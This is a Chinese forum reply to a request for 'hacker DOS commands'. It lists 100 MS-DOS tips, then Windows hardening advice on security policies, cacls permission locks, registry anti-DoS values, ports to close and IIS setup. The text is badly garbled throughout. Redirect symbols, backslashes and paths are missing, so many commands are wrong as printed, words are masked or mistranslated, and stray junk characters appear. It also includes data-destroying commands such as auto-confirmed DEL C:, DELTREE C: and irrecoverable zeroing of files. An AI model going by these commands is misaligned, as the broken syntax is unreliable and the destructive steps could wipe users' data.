我想要一份网易学院的”黑客必学dos命令“能发给我一份么 谢谢

这是我从网上找的DOS技巧100例，希望对你有用

1、*.*的简写

*.*可以用．代替，例如，删除当前目录中的全部文件∶

DEL.

2、返回父目录即上级目录

CD..

3、把目录文件的列表存入文本文件中

DIRfilename

4、查看当前目录下任何属性的文件

*** 一∶DIR

*** 二∶DIR/A

5、取消当前目录下所有文件的所有属性(实际上只能查看属性而不能取消-jm注)

ATTRIB，

若在C盘根目录下执行此命令，再用DIR来查看，可以看到IO.SYS、MSDOS.SYS等隐含文件

6、显示当前目录下的所有子目录名

DIR/AD

7、连续显示多个文件的内容

COPY *.* CON

8、分屏显示文件内容

*** 一∶MOREfilename

*** 二∶TYPE filename|more

9、改变磁盘文件的注册时间

*** 一∶COPY filename＋NUL

*** 二∶COPY filename＋,,

10、如何屏蔽DOS行的输出信息?

*** 是将屏幕输出重定向到DOS空设备NUL，例如∶

COPY MYPROG.EXE A:NUL

11、在DOS状态下直接显示用D方式编辑的WPS文件内容

COPY filename.wps CON/B

12、向文本文件中追加数据

*** 一∶COPY filename＋CON

*** 二∶TYPE CONfilename

输入完毕后按F6或Ctrl＋Z键结束。

13、键盘指法练习或汉字输入练习的简易屏幕

COPY CON NUL

14、直接打印键盘输入的内容

*** 一∶COPY CON PRN

*** 二∶MOREPRN

*** 三∶SORTPRN

输入完毕后按F6或Ctrl＋Z键。

15、DOS下直接编辑生成文件

在没有任何编辑软件(如EDLIN、EDIT等)的情况下，可临时用以下六种 *** 从键盘编辑生成文件，当文件内容输入完毕后，按F6键

或按Ctrl＋Z键存盘退出∶

*** 一∶COPY CON filename

*** 二∶TYPE CONfilename

*** 三∶MOREfilename

*** 四∶SORTfilename

*** 五∶FIND"XXX"/V/Nfilename

*** 六∶SORT|FIND"XXX"/V/Nfilename

*** 四、五、六均有特殊用处，读者不妨一试。

16、零字节文件的生成

*** ∶TYPE NULfilename

上述 *** 常用于处理需保密的磁盘文件，起到删除文件内容的作用，内容被删除后一般不可恢复。

17、对零字节文件的拷贝，不能用COPY命令，只能用XCOPY命令。

例如∶XCOPY filename1 filename2

18、目录中的所有文件和子目录的复制

XCOPY 目录名.驱动器号:/S

19、如何正确使用COPY 和XCOPY命令?

●将若干个文件联结成一个文件时，应使用COPY命令。

●拷贝小于64KB的单个文件，使用COPY命令。拷贝大于64KB的文件，应使用XCOPY命令。

●拷贝多个文件应使用XCOPY命令。

●拷贝子目录中的内容，应使用XCOPY/S命令。拷贝一批文件到软盘，应使用XCOPY/M命令。

20、什么时候用XCOPY命令的/D开关项?

有时候需要从某个目录中"选出"从某一天开始建立或修改过的文件，并将它们备份，此时可使用XCOPY/D命令。例如，下述命令可

以把C∶目录下那些在1996年7月1日以后建立或修改过的文件拷贝到A盘∶

XCOPY C:*.* A:/D:07－01－96

21、单软驱复制软盘

有的PC机只装有一个软驱，这个驱动器既当A盘又当B盘使用，如果要在这样的系统上进行软盘复制，使用下述的XCOPY 命令∶

XCOPY A: B:

22.整理软盘中碎块，提高使用效率

一张软盘经过多次建立和删除文件操作后，某些文件记录会以不连续的形式存放在软盘空间中，造成软盘空间产生许多碎块，影

响软盘的读写操作性能，严重时可导致读写故障。

解决以上问题可使用COPY命令进行整盘拷贝，则新盘上的文件保持连续存放。

23.将多个文件连续拷入多张软盘。

首先，用ATTRIB命令设置每一文件的文档特性∶

ATTRIB＋A *.*/S

然后使用XCOPY命令，在软盘装满后插入新盘，根据文档特性决定哪些文件需要拷贝，哪些不拷。

XCOPY *.* A∶/S/M/W

24.使用TYPE命令"拷贝"文件

拷贝文件通常使用COPY命令或XCOPY命令，其实，TYPE也有"拷贝"文件的用途∶

TYPE filenamelfilename2

这种 *** 对于拷贝隐含文件非常有效。例如∶TYPE IO.SYSA∶IO.SYS

25.以小写方式显示文件或目录

DIR/L

26.只显示文件名与子目录名，不显示文件大小和生成时间等信息

DIR/B

27.使DIR总是按文件名的字母顺序来显示文件

在AUTOEXEC BAT中加入下述命令即可∶

SET DIRCMD=/O

28.列当天创建的文件目录

若想知道当天(如1996年10月21日)建立了多少文件，可用下述命令列出∶

DIR|FIND"10 21 1996"

29.若不希望别人使用DIR命令进行目录文件列表，有什么 *** 呢?

*** 一∶DOSKEY DIR=You can not use DIR!

*** 二∶在AUTOEXEC BAT中加入命令行∶SET DIRCMD=0

此命令的功能是在用DIR命令来显示文件时，只显示"File not found"，能起到暂时保密的作用。若想显示文件及目录，只有指

定具体的文件名或路径。

*** 三∶SET DIRCMD=DIRNUL

此命令执行后再使用DIR命令，将输出没有文件的信息，也颇具迷惑性。

30.出所有目录中的文件

CHKDSK/V|MORE

31.如何在有多级目录的磁盘上查找文件

*** 一∶CHKDSK/V|FIND"文件名"其中文件名必须用大写字母。

*** 二∶DIR/S文件名

32.实时控制打印机的换行或换页

ECHO＋PRN(换行)

ECHO^LPRN(换页)

33.使计算机在DOS命令行发出声音

ECHO ^G

34.DOS命令提问的自动响应

例如∶

ECHO Y|DEL C∶

ECHO N|CHKDSK C∶/F

35.使ECHO命令显示空行

ECHO命令后直接跟空格字符时，ECHO将显示当前的信息回显状态(ON或OFF)，而不直接向屏幕回显空行。其实，下面一些非常简

单的命令格式都能使ECHO命令显示空行∶

ECHO ECHO， ECHO； ECHO＋

ECHO[ ECHO] ECHO/ ECHO\par

36.用ECHO命令向交互式DOS命令馈送回车符

例如∶

ECHO＋|DATE|FIND"Current date"

ECHO＋|TIME|FIND"Current time"

此技巧可用于AUTOEXEC.BAT中，使每次开机后直接显示当前日期和时间信息，不必按回车键就能继续下去。

37.开机时间黑匣子

有时需要记录每次使用计算机的日期和时间，以便加强用机管理。可以利用上述技巧，只须在AUTOEXEC.BAT文件中加入下列命令

∶

ECHO＋|DATEABC

ECHO＋|TIMEABC

这样在每次启动计算机后，文件ABC中就自动记录了日期和时间，执行命令TYPE ABC即可查看以往开机日期和时间。

38.自动统计命令或文件的运行时间

下面给出一个计时器TIMETEST.BAT，实现了自动统计命令或文件的运行时间∶

@ECHO OFF

TIME 0

COMMAND /C ％1 ％2 ％3 ％4

ECHO ％1 ％2 ％3 ％4运行时间为∶

ECHO＋|TIME|FIND"time is"

@ECHO ON

例如，测试AUTOEXEC.BAT运行时间∶

CTIMETEST AUTOEXEC.BAT ┆

AUTOEXEC.BAT运行时间为∶

Current time is 0∶00∶03 49

说明AUTOEXEC.BAT运行了3.49秒。

39.跳过或单步执行CONFIG.SYS和AUTOEXEC.BAT文件

*** 一∶启动计算机，屏幕出现Starting MS-DOS…时，按F5键或SHIFT键，DOS便会跳过CONFIG.SYS和AUTOEXEC.BAT两文件，用

系统运行的基本环境配置来启动机器。

*** 二∶当出现上面的提示后，按F8键，并通过键盘逐一回答Y或N来选择执行命令。

*** 三∶在CONFIG.SYS文件的命令中加上"?"号。如DOS?=UMS，这样在执行到该条命令时，便会出现[Y，N]?的选择提示，让你选

择是否装入该命令。

40.能否省去DOS启动时等待按F8或F5的两秒时间?

能。 *** 是在CONFIG SYS文件的头部加上语句SWITCHES=/F，此后同样可以实现以前的功能， *** 是在未出现"Starting MS-DOS

…"时就按下F8或F5键。

41.单步执行批处理文件

COMMAND/Y/C(批处理文件名)

开关/Y告诉DOS在执行每一行前暂停，提示[Y，N]?询问用户是否执行。

42.快速获取DOS命令的帮助信息

*** 一∶FAST HELP 命令名

*** 二∶命令名/?

*** 三∶命令名/H

43.方便地更改子目录名

以下MOVE命令能将C∶目录改名为C∶∶

MOVE C∶ C∶

44.什么时候使用MOVE命令移动文件?

MOVE命令的更大特点是可以在一个命令行里列出多个要移的文件，文件之间可用"，"号相隔。例如，将当前目录中所有可执行文

件均移进目录中∶

MOVE *.COM，*.EXE，*.BAT

45.用MOVE命令对子目录进行简单加密或解密

加密∶如将C∶目录利用半个汉字进行简单加密，可执行命令∶

MOVE C∶ C(半个汉字字符)

解密∶反之，可用MOVE命令结合通配符*或?，将不可识别的目录名改成其它名字，达到解密目的。

46.快速进入深层子目录

可用SUBST命令设置驱动器标识符，取代深层次子目录路径，使得进入深层次子目录十分方便。例如，下述命令可以将子目录C∶

模拟成M盘∶

SUBST M∶ C∶

这样，在任何目录下，只要将当前驱动器变成M，即可进入PRG子目录。

47.如何取消SUBST设置的盘符?

例如，要取消上例中的M盘，只须执行命令SUBST M∶/D即可。

48.建立并进入新目录的MD命令

DOS中的MD命令只能建立子目录，建好后再用CD命令进入，其实可以用∶

DOSKEY MD=MD ＄1 ＄T CD ＄1

对MD命令进行重新定义，此后使用MD时，建立目录和进入目录同步完成。

49.排除法文件列表

DIR命令中支持通配符*和?来代替其它字符，但却没有提供相应的排除字符的功能，而利用FIND命令中的/V参数，则能方便地实

现排除法列表。下述命令能将除去.BAK文件和子目录以外的所有文件列出∶

DIR|FIND/V"BAK"|FIND/V"DIR"

50.和的区别

DIRDIRLIST∶如果DIRLIST文件存在，将清除其文件内容，并将新内容输入文件中。

DIRDIRLIST∶如果DIRLIST文件存在，将输出数据附加到这个文件末尾。

在DIRLIST文件不存在时，两者是等价的。

51.快速添加搜索路径

PATH=％PATH％；％1

52.对数据文件及由字处理程序生成的文本文件等不可执行文件，建立自动搜索路径。

APPEND命令能将一组指定的目录添加进当前目录的逻辑扩展，从而不用指定路径就能打开这组文件。APPEND后可以放多个目录，

只要用"；"隔开即可，例如∶

APPEND C∶；C∶；C∶；C∶；

53.将目录名隐藏起来

由于ATTRIB命令可改变一个目录的属性，所以利用该命令可将目录名隐藏起来。例如，将目录C∶隐藏起来∶

ATTRIB ＋H C∶

54.快速删除目录树

用DELTREE命令可快速地删除指定目录，而不管目录中有多少子目录和目录及文件为何种属性。例如∶DELTREE C∶

55.防止误删除文件

DEL命令是一个危险的命令，可以用下述命令对其进行重新定义，使得在删除文件时有确认提示∶

DOSKEY DEL=DEL ＄1/P

56.如果误删除了某些文件，有什么办法及时地将它们恢复?

UNDELETE命令可以用来恢复删除文件，以下命令能将当前目录中的被删文件恢复出来∶

UNDELETE *.*/ALL

此命令恢复出来的文件名的之一个字符变成了＃，可用REN命令更改成原来的文件名。

57.删除多个文件名无共同特征的文件时，由于难用通配符，只能逐个删除，比较麻烦。有没有其他方便的 *** ?

有。使用DEL *.*/P命令，系统会逐个列出指定目录的所有文件，询问用户是否删除，对欲删除文件回答Y，否则回答N。

58.加密文件名一法

在要加密的文件名最后加上ASCII字符255。 *** 是输入文件名后按下ALT键，然后输入255。这样，用DIR命令列出该文件时，并

不显示这个字符，即从文件名看不出发生了任何变化，起到了一定的加密作用。

59.回忆用过的命令

执行DOSKEY命令后，用户所输入的命令便被存储起来，以后若要回忆使用过的命令，可随时用"↑"或"↓"键进行前后逐条查找。

60.禁止非法访问某个驱动器

在AUTOEXEC.BAT文件中加入下述两条命令，可以禁止非法访问D盘，当输入D∶时，屏幕即关闭，只有知道密码ZM的人才能进入D

盘∶

DOSKEY D∶=ECHO OFF

DOSKEY ZM=D∶

61.防止别人误将C盘格式化

为了保护C盘，防止别人格式化，可用DOSKEY对FORMAT命令进行重新定义，例如∶

DOSDEY FORMAT=You can not format C∶!

这样，别人在使用FORMAT时将出现Yor can not format C∶!的提示，从而使C盘得到保护。若自己想用FORMAT时，再用如下命令

恢复∶

DOSKEY FORMAT=

62.检查屏幕状态，获得有关屏幕显示字符和行数的报告

MODE CON

63.设置屏幕每行显示字符数和每屏的行数

例如∶

MODE CON COLS=80 LINES=25

64.提高键盘的响应速度

MODE CON∶RATE=32 DELAY=1

65.不喜欢系统启动时Num Lock键的缺省设置怎么办?

在CONFIG SYS文件中加进NUMLOCK命令，根据你的爱好指定系统启动时NUMLOCK键的状态∶

NUMLOCK=ON(或OFF)

66.简单的键盘锁

在你使用计算机时，如果只离开一会，又不想关机，为了不让别人随意使用，可编制一个简单的键盘锁LOCK BAT程序(内容如下)

∶

@ECHO OFF

CLS

CHOICE/C:*/N

运行之后，形同死机，"*"号就是键盘锁的钥匙，不知道的人无法破译。

67.文件的选择显示

假设有MY1 TXT、MY2 TXT、…、MY10.TXT共10个文件，现欲显示其中的MY2.TXT、MY3.TXT、MY6.TXT和MY9.TXT 4个文件，可用如

下命令很方便地实现∶

FOR ％A IN(2369)DO TYPE MY％A.TXT

68.删除误拷贝文件

当用COPY A∶*.*命令把A盘上所有文件拷贝到硬盘某子目录下时，却不慎误拷贝到硬盘根目录下，如误拷贝的文件数量很多，且

文件名没有任何特征，这时如要删除这些文件，通常做法是用PCTOOLS工具软件进行选择删除，比较麻烦。使用FOR命令就简单多了∶

AFOR ％A IN(*.*)DO DEL C∶％A

69.由于FIND命令不能接受通配符，若希望在若干个文本文件中寻找含有某个字符串插，就只能对每个文件依次使用FIND命令，

显然很费功夫，没有捷径吗?

有。使用FOR命令与FIND命令配合，格式为∶

FOR％A IN(文件组)DO FIND"string"％A

70.FOR命令不能嵌套，有没有办法实现FOR循环嵌套呢?

有。可以把COMMAND.COM作为之一层循环里的命令，让它再执行一个FOR循环命令。例如，下述命令可以在屏幕上显示12

行"Welcome you":FOR ％A IN(123)DO COMMAND/C FOR ％B IN(1234)DO ECHO Welcome you

71.双冒号∶∶在注释行中的作用

在DOS批处理文件开头，经常使用REM注释命令加一个程序头。例如，假设有一个名为TEST.BAT的批处理文件，它以一个文本文件名

为输入参数，若在开头说明其用法时，使用了一个采用和和括号的注释行，即∶

REM TESTfilename

程序执行此命令时，DOS将显示"File not found"信息，因为它以为filename是一个重定向输入操作的源文件，它在当前目录中

找不到。如何解决这个问题?

很简单，只须将REM改为双冒号"∶∶"，即∶

∶∶TESTfilename

72.批处理中的IF ERRORLEVEL

在批处理文件里使用IF ERRORLEVEL命令时要小心，因为DOS认为任何大于或等于设定值的出口状态值都是等效的。通常应按从大到

小的次序测试出口状态值，例如∶

IF ERRORLEVEL 2 ECHO TWO

IF ERRORLEVEL 1 ECHO ONE

IF ERRORLEVEL 0 ECHO ZERO

73.能不能按从小到大的次序测试出口状态值?

能。但应结合IF NOT的形式进行判断，例如72例中的命令应改为∶

IF ERRORLEVEL 0 IF NOT ERRORLEVEL 1 ECHO ZERO

IF ERRORLEVEL 1 IF NOT ERRORLEVEL 2 ECHO ONE

IF ERRORLEVEL 2 IF NOT ERRORLEVEL 3 ECHO TWO

74.批处理文件中使用@符禁止命令显示在屏幕上

由于DOS是在各个命令执行前就将它们显示到屏幕上的，因此，即使你将ECHO命令置为OFF，它本身也会出现在屏幕上。要抑制它

的显示，可在ECHO命令行前加@符∶@ ECHO OFF

75.统计源程序的行数

假设源程序名为ZM.PRG，下述FIND命令可方便地统计它共有多少行∶

FIND/V/C" "ZM.PRG

76.对文本文件进行排序

SORT命令常用来对一些基于文本行的文件进行排序显示。例如，按姓名的开头字母显示一个含有 *** 号码的清单文件。命令格式

∶

SORT[/R][/＋n]filename1filename2

其中，/R表示反向排序，/＋n表示从第几行开始排序，filename1为源文件名，filename2为排序后的文件名。

77.用PROMPT设置有意义的提示符

PROMPT命令用于设置新的DOS系统提示符。例如∶

PROMPT ＄P＄G 取当前驱动器名及目录作为提示符

PROMPT ＄D＄G 取当前系统日期作为提示符。

78.如何设定屏幕颜色?

假设ANSI.SYS已被安装在内存中，以下命令可把屏幕设置成白底红字∶

PROMPT ＄E[31；47m

79.在屏幕上选定的位置显示日期和时间信息

把ANSI SYS的屏幕和光标控制功能与PROMPT的设定DOS命令提示符功能结合起来，可以在屏幕上选定的位置显示特殊的信息。例

如，在AUTOEXEC BAT中加入下述命令行，可将日期和时间信息移到屏幕的右下方∶

PROMPT ＄E[S ＄E[25;52H ＄D＄T ＄E[u ＄P＄G

80.用F2键编辑上次命令

用F1或F3功能键可复制上次命令，类似地F2键能得到部分上次命令，当按下F2键时，DOS就将上次命令内容拷贝到按F2键后键入的

字符(不含)为止。

例如，键入了以下命令∶

CDIR.COMenter

按F2键及M键，可以得到∶

CDIR

这时再按INS插入键，输入R，再按F3键复制上次命令剩余部分，得到正确的命令∶

CDIR.COM

81、用F4键编辑上次命令

当按下F4键时，DOS从按F4键后按的字母开始复制上次命令。例如，上次命令为∶

CDIR[enter]

按下F4键，再输入F，然后再按F3，DOS就会显示FORMAT命令∶

CFORMAT

82、用SHELL命令改变环境空间的大小

将环境变量空间增加到1KB，可在CONFIG.SYS文件中加进命令行∶

SHELL=C∶.COM/P/E∶1024

83、在批处理文件中引用环境变量

批处理文件可以引用系统上已定义的环境变量。具体 *** 是在环境变量名的前后各放一个百分号"％"。例如，要在批处理文件中显

示环境变量PATH的内容，可加进命令行∶

ECHO ％PATH％

84、查看单个环境变量

如果你经常使用环境变量，当用SET命令显示当前所有已分配的环境变量时，列表就可能很长，屏幕可能很杂乱。为方便起见，可

用下面的批处理文件VIEWENV.BAT在命令行直接显示单个环境变量∶

SET|FIND/I "％1"

例如，要察看COMSPEC的内容，只须执行∶

VIEWENV COMSPEC

85、 *** DOS系统盘

*** 一∶FORMAT A∶/S

*** 二∶SYS A∶

86、定期整理硬盘

具体步骤∶

?删除硬盘中不必要的文件

?运行CHKDSK/F

?运行DEFRAG

87、了解内存的类型

?常规内存∶0～640KB

?上位内存区(UMA)∶640KB～1MB

?扩展内存∶自1MB起向上延伸

?高内存区(HMA)∶1MB以上的稍小于64KB的扩展内存区

?扩充内存

88、将DOS移到高内存区

为使用户有较大的可用基本内存，可以在CONFIG.SYS文件中加入下述命令，加载HIMEM.SYS，将DOS移入高内存区(HMA)∶

DEVICE=C∶.SYS

DOS=HIGH

89、将设备驱动程序和内存驻留程序装入上位内存(UMB)

在CONFIG.SYS文件中加进命令∶

DEVICE=C∶.EXE NOEMS

DOS=UMB

90、将程序装入高内存区

将程序装入HMA的 *** 是在命令行上加一个/U开关，例如∶

MOUSE/U

91、上位内存的使用

为将程序驻留上位内存，使用LOADHIGH(或LH)程序名即或，例如∶

LH MOUSE

92、如何显示某个特定程序占用内存的情况?

MEM/M module

其中，module表示特定程序文件名，不要带扩展名。

93、使用Memmaker自动优化内存

执行MEMMAKER/BATCH命令，MEMMAKER就自动为CONFIG.SYS和AUTOEXEC.BAT文件做更优的设置，此后，执行MEM/C/P来观察内存的分

配情况，你会发现主存变大了。

94、若不满意MEMMAKER的优化设置，应该怎么办?

很简单，只须执行MEMMAKER/UNDO即可恢复你原来的配置。

95、磁盘高速缓冲存储器 *** ARTDRV的使用

为建立一个具有256K(默认值)的磁盘高速缓存，可在AUTOEXEC.BAT文件中加入命令行∶

C∶

由于 *** ARTDRV是建立在扩展内存中，所以还必须在CONFIG.SYS文件中加入命令行∶

DEVICE=C∶.SYS

96、当你关闭计算机或重新启动时，希望确定所有在高速缓存的信息均已写入硬盘时，应在系统提示符下键入命令∶

*** ARTDRV/C

97、跳过SCANDISK的磁介质扫描

运行SCANDISK时，磁介质扫描要消耗很长时间，其实，使用SCANDISK/CHECKON *** 便可跳过它。

98、LOADFIX命令的正确使用

在优化过程中，有少数程序不能在640KB常规内存的低64KB内正确运行。此时，可使用LOADFIX命令让可执行程序(如ZMPROG.EXE)在

低64KB以上的内存中运行， *** 是在要运行的应用程序前加上LOADFIX∶

LOADFIX ZMPROG

99、何时使用虚拟盘(也称RAM盘)?

RAM盘能显着提高磁盘文件的存取速度，但它在断电或重启动时会丢失数据。因此，使用RAM盘时要特别小心。在没有硬盘的系统上

，RAM盘值得一用；在需要存放较大的临时文件或复制程序时，也可以使用；当你的系统上配有CD-ROM时，在开始工作前，可将CD-

ROM盘上的文件与数据复制进RAM盘，能够显着提高效率。

100、虚拟盘的安装

DOS提供的RAMDRIVE.SYS是一个虚拟盘驱动程序，你可以将它安装进内存，让它使用扩展内存或扩充内存，生成指定大小的RAM盘。

例如，在CONFIG.SYS中加进下述命令，可在扩展内存中生成一个1MB的RAM盘∶

DEVICE=C∶.SYS 1024/E

怎样防黑客及木马软件?

安全策略:

打开管理工具

找到本地安全设置.本地策略.安全选项

1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,启用比较好,但是我个人是不需要直接输入密码登陆的]

2. *** 访问.不允许SAM帐户的匿名枚举 启用

3. *** 访问.可匿名的共享 将后面的值删除

4. *** 访问.可匿名的命名管道 将后面的值删除

5. *** 访问.可远程访问的注册表路径 将后面的值删除

6. *** 访问.可远程访问的注册表的子路径 将后面的值删除

7. *** 访问.限制匿名访问命名管道和共享

8.帐户.重命名来宾帐户guest [更好写一个自己能记住中文名]让黑客去猜解guest吧,而且还得删除这个帐户,后面有详细解释]

9.帐户.重命名系统管理员帐户[建议取中文名]

E计划.用户权限分配策略:

打开管理工具

找到本地安全设置.本地策略.用户权限分配

1.从 *** 访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID

2.从远程系统强制关机,Admin帐户也删除,一个都不留

3.拒绝从 *** 访问这台计算机 将ID删除

4.从 *** 访问此计算机,Admin也可删除,如果你不使用类似3389服务

5.通过终端允许登陆 删除Remote Desktop Users

F计划.终端服务配置

打开管理工具

终端服务配置

1.打开后，点连接,右键,属性,远程控制,点不允许远程控制

2.常规,加密级别,高,在使用标准windows验证上点√!

3.网卡,将最多连接数上设置为0

4.高级,将里面的权限也删除.[我没设置]

再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话

G计划.用户和组策略

打开管理工具

计算机管理.本地用户和组.用户

删除Support_388945a0用户等等

只留下你更改好名字的adminisrator权限

计算机管理.本地用户和组.组

组.我们就不组了.分经验的(不管他.默认设置)

X计划.DIY策略[根据个人需要]

1.当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.

2.登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.

3.对匿名连接的额外限制

4.禁止按 alt+crtl+del

5.允许在未登陆前关机[防止远程关机/启动、强制关机/启动]

6.只有本地登陆用户才能访问cd-rom

7.只有本地登陆用户才能访问软驱

8.取消关机原因的提示

1、打开控制面板窗口，双击“电源选项”图标，在随后出现的电源属性窗口中，进入到“高级”标签页面；

2、在该页面的“电源按钮”设置项处，将“在按下计算机电源按钮时”设置为“关机”，单击“确定”按钮，来退出设置框；

3、以后需要关机时，可以直接按下电源按键，就能直接关闭计算机了。当然，我们也能启用休眠功能键，来实现快速关机和开机；

4、要是系统中没有启用休眠模式的话，可以在控制面板窗口中，打开电源选项，进入到休眠标签页面，并在其中将“启用休眠”选项选中就可以了。

9.禁止关机事件跟踪

开始“Start -”运行“ Run -输入”gpedit.msc “，在出现的窗口的左边部分，

选择 ”计算机配置“（Computer Configuration ）- ”管理模板“

（Administrative Templates）- ”系统“（System）,在右边窗口双击

“Shutdown Event Tracker” 在出现的对话框中选择“禁止”（Disabled），

点击然后“确定”（OK）保存后退出这样，你将看到类似于windows 2000的关机窗口

三、修改权限防止病毒或木马等破坏系统

winxp、windows2003以上版本适合本 *** .

因为目前的木马抑或是病毒都喜欢驻留在system32目录下,如果我们用命令限制system32的写入和修改权限的话

那么,它们就没有办法写在里面了.看命令

A命令

cacls C:windowssystem32 /G administrator:R 禁止修改、写入C:windowssystem32目录

cacls C:windowssystem32 /G administrator:F 恢复修改、写入C:windowssystem32目录

呵呵，这样病毒等就进不去了，如果你觉得这个还不够安全，

还可以进行修改觉得其他危险目录,比如直接修改C盘的权限，但修改c修改、写入后，安装软件时需先把权限恢复过来才行

B命令

cacls C: /G administrator:R 禁止修改、写入C盘

cacls C: /G administrator:F 恢复修改、写入C盘

这个 *** 防止病毒，

如果您觉得一些病毒防火墙消耗内存太大的话

此 *** 稍可解决一点希望大家喜欢这个 *** ^_^

X命令

以下命令推荐给高级管理员使用[因为win版本不同,请自行修改参数]

cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止 *** 用户、本地用户在命令行和gui下使用cmd

cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢复 *** 用户、本地用户在命令行和gui下使用cmd

cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止 *** 用户、本地用户在命令行和gui下使用tftp.exe

cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢复 *** 用户、本地用户在命令行和gui下使用tftp.exe

cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止 *** 用户、本地用户在命令行和gui下使用tftp32.exe

cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢复 *** 用户、本地用户在命令行和gui下使用tftp32.exe

四、重要文件名加密[NTFS格式]

此命令的用途可加密windows的密码档, *** 密码档等等^.^

命令行方式

加密：在DOS窗口或“开始” | “运行”的命令行中输入“cipher /e 文件名（或文件夹名）”。

解密：在DOS窗口或“开始” | “运行”的命令行中输入“cipher /d 文件名（或文件夹名）”。

五、修改注册表防御D.D.O.S

在注册表HKLMSYSTEMCurrentControlSetServicesTcpipParameters中更改以下值可以帮助你防御一定强度的DoS攻击

SynAttackProtect REG_DWORD 2

EnablePMTUDiscovery REG_DWORD 0

NoNameReleaseOnDemand REG_DWORD 1

EnableDeadGWDetect REG_DWORD 0

KeepAliveTime REG_DWORD 300,000

PerformRouterDiscovery REG_DWORD 0

EnableICMPRedirects REG_DWORD 0

更多新的防御技巧请搜索其他信息,

由于本人不敢拿自己的硬盘开玩笑,所以没做实验... ...

六、打造更安全的防火墙

只开放必要的端口，关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放，

黑客就会利用扫描工具扫描那些端口可以利用，这对安全是一个严重威胁。 本人现将自己所知道的端口公布如下(如果觉得还有危险需要过滤的,请联系本人：OICQ 13946296

　

　 端口 协议 应用程序

　 21 TCP FTP

　 25 TCP *** TP

　 53 TCP DNS

　 80 TCP HTTP SERVER

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 6（非端口） IP协议

　 8（非端口） IP协议

那么,我们根据自己的经验,将下面的端口关闭

　 TCP

　 21

　 22

　 23

　 25 TCP *** TP

　 53 TCP DNS

　 80

　 135 epmap

　 138 [冲击波]

　 139 *** b

　 445

　 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b

　 1026 DCE/12345778-1234-abcd-ef00-0123456789ac

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 3389

　 4444[冲击波]

　 4489

　 UDP

　 67[冲击波]

　 137 netbios-ns

　 161 An SNMP Agent is running/ Default community names of the SNMP Agent

　 关于UDP一般只有腾讯OICQ会打开4000或者是8000端口,那么,我们只运行本机使用4000端口就行了

七、保护个人隐私

1、TT浏览器

选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的.

TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是.[TT就是腾讯的浏览器](不过有些人喜欢用MyIE,因为我使用的时间和对他的了解不是很深吧,感觉不出他对安全方面有什么优势一_一~,希望支持MyIE的朋友不要揍我,否则我会哭... ...)

2、移动“我的文档”

进入资源管理器，右击“我的文档”，选择“属性”，在“目标文件夹”选项卡中点“移动”按钮，

选择目标盘后按“确定”即可。在Windows 2003中“我的文档”已难觅芳踪，桌面、开始等处都看不到了，

建议经常使用的朋友做个快捷方式放到桌面上。

3、移动IE临时文件

进入“开始→控制面板→Internet 选项”，在“常规”选项卡的“Internet 文件”栏里点“设置”按钮，

在弹出窗体中点“移动文件夹”按钮，选择目标文件夹后，点“确定”，在弹出对话框中选择“是”，

系统会自动重新登录。点本地连接,高级,安全月志,把月志的目录更改专门分配月志的目录，

不建议是C:再重新分配月志存储值的大小,我是设置了10000KB

八、第三方软件的帮助

防火墙：天网防火墙（建议）[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会)

杀毒软件：卡巴斯基

二道贩子后注:

现在黑客的攻击有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.

Windows 2000服务器的安全设置

设置禁用，构建之一道防线c_

在安装完Windows 2000后，首先要装上最新的系统补丁。但即使装上了，在因特网上的任何一台机器上只要输入“＼＼你的IP地址＼c”，然后输入用户名 Guest，密码空，就能进入你的C盘，你还是完全暴露了。解决的 *** 是禁用•格斯特账号，为管理人设置一个安全的密码，将各驱动器的共享设为不共享。同时你还要关闭不需要的服务。你可以在管理工具的服务中将它们设置为禁用，但要提醒的是一定要慎重，有的服务是不能禁用的。一般可以禁用的服务有Telnet、任务调度程序(允许程序在指定时间运行)、遥远的登记服务(允许远程注册表操作)等。这是你构建的服务器的之一道防线。-设置第二，构建第二道防线*i

© 作为校园网的服务器，很多学校将该服务器同时作为网站服务器，而第二的漏洞也是一个棘手的问题。实际上，你可以通过简单的设置，完全可以将网站的漏洞补上。你可以将第二默认的服务都停止(如图 1，FTP服务你是不需要的，要的话笔者推荐用Serv-U；“管理网站点”和“默认网站点”都会给你带来麻烦；简单邮件传输协议一般也不用)，然后再新建一个网站点h

©设置好常规内容后，在“属性→主目录”的配置中对应用程序映射进行设置，删除不需要的映射(如图 2)，这些映射是第二受到攻击的直接原因。如果你需要CGI和PHP的话，可参阅一些资料进行设置LB

这样，配合常规设置，你的第二就可以安全运行了，你的服务器就有了第二道防线。#_t1)

运用扫描程序，堵住安全漏洞[J=

©要做到全面解决安全问题，你需要扫描程序的帮助。笔者推荐使用X浏览(如图 3)，它可以帮助你检测服务器的安全问题。rmp

扫描完成后，你要看一下，是否存在口令漏洞，若有，则马上要修改口令设置；再看一下是否存在第二漏洞，若有，请检查第二的设置。其他漏洞一般很少存在，我要提醒大家的是注意开放的端口，你可以将扫描到的端口记录下来，以方便进行下一步设置。vY)

© 封锁端口，全面构建防线YD_\1

©《 黑客大多通过端口进行入侵，所以你的服务器只能开放你需要的端口，那么你需要哪些端口呢？以下是常用端口，你可根据需要取舍：7e|

